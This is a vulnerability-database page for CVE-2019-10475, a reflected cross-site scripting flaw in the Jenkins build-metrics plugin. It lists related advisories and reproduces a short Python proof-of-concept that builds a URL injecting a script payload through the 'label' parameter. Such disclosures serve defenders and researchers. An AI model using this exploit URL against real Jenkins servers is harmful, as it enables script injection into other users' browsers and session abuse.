Vulners
Lucene search
Jenkins build-metrics plugin 1.3 - (label) Cross-Site Scripting Vulnerability
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | Exploit for Cross-site Scripting in Jenkins Build-Metrics | 6 Nov 201922:19 | – | githubexploit |
 | CloudBees Jenkins build-metrics Plugin Cross-Site Scripting Vulnerability | 28 Oct 201900:00 | – | cnvd |
 | Jenkins build-metrics Plugin Cross-Site Scripting (CVE-2019-10475) | 7 Nov 201900:00 | – | checkpoint_advisories |
 | CVE-2019-10475 | 23 Oct 201912:45 | – | cve |
 | CVE-2019-10475 | 23 Oct 201912:45 | – | cvelist |
 | Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting | 8 Nov 201900:00 | – | exploitdb |
 | Jenkins build-metrics plugin 1.3 - label Cross-Site Scripting | 8 Nov 201900:00 | – | exploitpack |
 | Jenkins build-metrics Plugin reflected cross-site scripting vulnerability | 24 May 202216:59 | – | github |
 | Jenkins build-metrics 1.3 - Cross-Site Scripting | 8 Jun 202604:09 | – | nuclei |
 | CVE-2019-10475 | 23 Oct 201913:15 | – | nvd |
10
# Exploit Title: Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting
# Exploit Author: vesche (Austin Jackson)
# Vendor Homepage: https://plugins.jenkins.io/build-metrics
# Version: Jenkins build-metrics plugin 1.3 and below
# Tested on: Debian 10 (Buster), Jenkins 2.203 (latest 2019-11-05), and build-metrics 1.3
# CVE: CVE-2019-10475
# Write-up: https://github.com/vesche/CVE-2019-10475
#!/usr/bin/env python
import sys
import argparse
VULN_URL = '''{base_url}/plugin/build-metrics/getBuildStats?label={inject}&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search'''
def get_parser():
parser = argparse.ArgumentParser(description='CVE-2019-10475')
parser.add_argument('-p', '--port', help='port', default=80, type=int)
parser.add_argument('-d', '--domain', help='domain', default='localhost', type=str)
parser.add_argument('-i', '--inject', help='inject', default='<script>alert("CVE-2019-10475")</script>', type=str)
return parser
def main():
parser = get_parser()
args = vars(parser.parse_args())
port = args['port']
domain = args['domain']
inject = args['inject']
if port == 80:
base_url = f'http://{domain}'
elif port == 443:
base_url = f'https://{domain}'
else:
base_url = f'http://{domain}:{port}'
build_url = VULN_URL.format(base_url=base_url, inject=inject)
print(build_url)
return 0
if __name__ == '__main__':
sys.exit(main())
# 0day.today [2019-12-04] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Nov 2019 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.92445